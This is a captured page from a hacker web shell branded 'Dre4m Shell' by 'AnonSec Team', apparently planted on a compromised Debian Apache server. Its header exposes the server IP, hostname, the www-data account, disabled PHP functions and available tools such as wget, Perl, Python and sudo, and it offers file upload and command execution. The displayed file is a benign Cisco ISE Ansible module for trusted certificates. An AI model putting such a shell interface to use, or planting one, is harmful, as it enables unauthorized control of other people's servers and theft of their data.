Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.118.1.100
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/lib/python3/dist-packages/ansible_collections/cisco/ise/plugins/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /usr/lib/python3/dist-packages/ansible_collections/cisco/ise/plugins/modules/trusted_certificate.py
#!/usr/bin/python
# -*- coding: utf-8 -*-

# Copyright (c) 2021, Cisco Systems
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)

DOCUMENTATION = r"""
---
module: trusted_certificate
short_description: Resource module for Trusted Certificate
description:
- Manage operations update and delete of the resource Trusted Certificate.
- This API deletes a Trust Certificate from Trusted Certificate Store based on a given ID.
- Update a trusted certificate present in Cisco ISE trust store.
version_added: '1.0.0'
extends_documentation_fragment:
  - cisco.ise.module
author: Rafael Campos (@racampos)
options:
  authenticateBeforeCRLReceived:
    description: Switch to enable or disable CRL verification if CRL is not received.
    type: bool
  automaticCRLUpdate:
    description: Switch to enable or disable automatic CRL update.
    type: bool
  automaticCRLUpdatePeriod:
    description: Automatic CRL update period.
    type: int
  automaticCRLUpdateUnits:
    description: Unit of time for automatic CRL update.
    type: str
  crlDistributionUrl:
    description: CRL Distribution URL.
    type: str
  crlDownloadFailureRetries:
    description: If CRL download fails, wait time before retry.
    type: int
  crlDownloadFailureRetriesUnits:
    description: Unit of time before retry if CRL download fails.
    type: str
  description:
    description: Description for trust certificate.
    type: str
  downloadCRL:
    description: Switch to enable or disable download of CRL.
    type: bool
  enableOCSPValidation:
    description: Switch to enable or disable OCSP Validation.
    type: bool
  enableServerIdentityCheck:
    description: Switch to enable or disable verification if HTTPS or LDAP server certificate
      name fits the configured server URL.
    type: bool
  id:
    description: Id path parameter. ID of the trust certificate.
    type: str
  ignoreCRLExpiration:
    description: Switch to enable or disable ignore CRL expiration.
    type: bool
  name:
    description: Friendly name of the certificate.
    type: str
  nonAutomaticCRLUpdatePeriod:
    description: Non automatic CRL update period.
    type: int
  nonAutomaticCRLUpdateUnits:
    description: Unit of time of non automatic CRL update.
    type: str
  rejectIfNoStatusFromOCSP:
    description: Switch to reject certificate if there is no status from OCSP.
    type: bool
  rejectIfUnreachableFromOCSP:
    description: Switch to reject certificate if unreachable from OCSP.
    type: bool
  selectedOCSPService:
    description: Name of selected OCSP Service.
    type: str
  status:
    description: Trusted Certificate's status.
    type: str
  trustForCertificateBasedAdminAuth:
    description: Trust for Certificate based Admin authentication.
    type: bool
  trustForCiscoServicesAuth:
    description: Trust for authentication of Cisco Services.
    type: bool
  trustForClientAuth:
    description: Trust for client authentication and Syslog.
    type: bool
  trustForIseAuth:
    description: Trust for authentication within Cisco ISE.
    type: bool
requirements:
- ciscoisesdk >= 2.0.8
- python >= 3.5
seealso:
- name: Cisco ISE documentation for Certificates
  description: Complete reference of the Certificates API.
  link: https://developer.cisco.com/docs/identity-services-engine/v1/#!certificate-openapi
notes:
  - SDK Method used are
    certificates.Certificates.delete_trusted_certificate_by_id,
    certificates.Certificates.update_trusted_certificate,

  - Paths used are
    delete /api/v1/certs/trusted-certificate/{id},
    put /api/v1/certs/trusted-certificate/{id},

"""

EXAMPLES = r"""
- name: Update by id
  cisco.ise.trusted_certificate:
    ise_hostname: "{{ise_hostname}}"
    ise_username: "{{ise_username}}"
    ise_password: "{{ise_password}}"
    ise_verify: "{{ise_verify}}"
    state: present
    authenticateBeforeCRLReceived: true
    automaticCRLUpdate: true
    automaticCRLUpdatePeriod: 0
    automaticCRLUpdateUnits: string
    crlDistributionUrl: string
    crlDownloadFailureRetries: 0
    crlDownloadFailureRetriesUnits: string
    description: string
    downloadCRL: true
    enableOCSPValidation: true
    enableServerIdentityCheck: true
    id: string
    ignoreCRLExpiration: true
    name: string
    nonAutomaticCRLUpdatePeriod: 0
    nonAutomaticCRLUpdateUnits: string
    rejectIfNoStatusFromOCSP: true
    rejectIfUnreachableFromOCSP: true
    selectedOCSPService: string
    status: string
    trustForCertificateBasedAdminAuth: true
    trustForCiscoServicesAuth: true
    trustForClientAuth: true
    trustForIseAuth: true

- name: Delete by id
  cisco.ise.trusted_certificate:
    ise_hostname: "{{ise_hostname}}"
    ise_username: "{{ise_username}}"
    ise_password: "{{ise_password}}"
    ise_verify: "{{ise_verify}}"
    state: absent
    id: string

"""

RETURN = r"""
ise_response:
  description: A dictionary or list with the response returned by the Cisco ISE Python SDK
  returned: always
  type: dict
  sample: >
    {
      "authenticateBeforeCRLReceived": "string",
      "automaticCRLUpdate": "string",
      "automaticCRLUpdatePeriod": "string",
      "automaticCRLUpdateUnits": "string",
      "crlDistributionUrl": "string",
      "crlDownloadFailureRetries": "string",
      "crlDownloadFailureRetriesUnits": "string",
      "description": "string",
      "downloadCRL": "string",
      "enableOCSPValidation": "string",
      "enableServerIdentityCheck": "string",
      "expirationDate": "string",
      "friendlyName": "string",
      "id": "string",
      "ignoreCRLExpiration": "string",
      "internalCA": true,
      "isReferredInPolicy": true,
      "issuedBy": "string",
      "issuedTo": "string",
      "keySize": "string",
      "link": {
        "href": "string",
        "rel": "string",
        "type": "string"
      },
      "nonAutomaticCRLUpdatePeriod": "string",
      "nonAutomaticCRLUpdateUnits": "string",
      "rejectIfNoStatusFromOCSP": "string",
      "rejectIfUnreachableFromOCSP": "string",
      "selectedOCSPService": "string",
      "serialNumberDecimalFormat": "string",
      "sha256Fingerprint": "string",
      "signatureAlgorithm": "string",
      "status": "string",
      "subject": "string",
      "trustedFor": "string",
      "validFrom": "string"
    }

ise_update_response:
  description: A dictionary or list with the response returned by the Cisco ISE Python SDK
  returned: always
  version_added: '1.1.0'
  type: dict
  sample: >
    {
      "response": {
        "id": "string",
        "link": {
          "href": "string",
          "rel": "string",
          "type": "string"
        },
        "message": "string"
      },
      "version": "string"
    }
"""

Anon7 - 2022
AnonSec Team